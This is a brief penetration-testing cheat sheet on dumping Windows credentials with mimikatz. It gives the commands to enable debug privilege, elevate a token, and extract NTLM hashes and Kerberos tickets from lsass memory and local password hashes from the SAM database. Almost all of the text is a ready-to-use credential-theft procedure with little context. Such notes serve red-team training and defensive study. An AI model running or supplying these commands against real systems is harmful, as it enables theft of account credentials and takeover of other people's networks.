Dump NTLM Hashes from Memory
We use mimikatz to extract the ntlm hashes / tickets from lsass memory.
Start mimikatz:
.\mimikatz.exeThen engage SeDebug privilege:
privilege::debug(DONT USE UNLESS NEEDED - this is optional - used mostly to bypass UAC)
token::elevateThen we extract the NTLM hashes with either of those commands:
TO TARGET LSASS MEMORY (DOMAIN USERS)
sekurlsa::logonpasswordsOr alternatively we can extract the TGS/TGT:
sekurlsa::ticketsTO TARGET SAM LOCAL DB (LOCAL USERS)
lsadump::samLast updated